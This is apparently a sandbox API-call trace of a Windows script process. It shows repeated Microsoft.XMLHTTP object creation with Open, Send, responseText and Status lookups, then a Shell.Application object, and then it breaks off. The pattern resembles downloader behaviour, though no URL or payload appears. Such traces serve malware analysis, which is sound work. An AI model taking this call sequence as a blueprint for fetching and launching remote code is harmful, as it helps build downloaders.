	[0437.562] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0437.564] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0437.564] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0437.564] SysStringLen (param_1=0x0) returned 0x0
	[0437.564] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0437.564] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0437.565] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0437.565] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0437.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0437.565] ??2@YAPEAX_K@Z () returned 0x62f310
	[0437.565] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0437.565] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0437.565] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0437.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0437.565] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0437.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0437.565] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0437.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0437.565] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0437.565] SysStringLen (param_1=0x0) returned 0x0
	[0437.565] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0437.566] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0437.566] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0437.566] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0437.566] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bd8) returned 0x0
	[0437.566] ??2@YAPEAX_K@Z () returned 0x62f330
	[0437.566] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bd8, pUnkSite=0x62f330) 
	[0437.566] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0437.566] XMLHTTPRequest:IUnknown:Release (This=0x49c5bd8) returned 0x0
	[0437.566] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0437.566] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0437.566] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0437.566] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0437.566] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0437.566] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0437.566] SysStringLen (param_1=0x0) returned 0x0
	[0437.566] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0437.566] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0437.567] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c20) returned 0x0
	[0437.567] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0437.567] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0437.567] ??2@YAPEAX_K@Z () returned 0x62f310
	[0437.567] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f310) 
	[0437.567] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0437.567] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0437.567] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c20) returned 0x0
	[0437.567] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c20) returned 0x3
	[0437.567] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0437.567] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c20, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0437.567] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0437.567] longjmp () 
	[0437.568] longjmp () 
	[0437.568] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0437.568] SysStringLen (param_1=0x0) returned 0x0
	[0437.568] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0437.568] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0437.568] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0437.568] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0437.568] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0437.568] ??2@YAPEAX_K@Z () returned 0x62f330
	[0437.568] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0437.568] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0437.568] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0437.568] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0437.568] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0437.568] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0437.568] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0437.568] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0437.569] longjmp () 
	[0437.569] longjmp () 
	[0437.569] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0437.569] SysStringLen (param_1=0x0) returned 0x0
	[0437.569] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0437.569] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0437.569] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0437.569] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0437.569] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bd8) returned 0x0
	[0437.569] ??2@YAPEAX_K@Z () returned 0x62f310
	[0437.569] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bd8, pUnkSite=0x62f310) 
	[0437.569] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0437.569] XMLHTTPRequest:IUnknown:Release (This=0x49c5bd8) returned 0x0
	[0437.569] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0437.569] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0437.569] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0437.570] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0437.570] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0437.570] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0437.570] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0437.570] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0437.949] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0437.949] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0437.949] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0437.949] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0437.949] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0437.949] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0437.950] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0437.950] SysStringLen (param_1=0x0) returned 0x0
	[0437.950] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0437.950] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
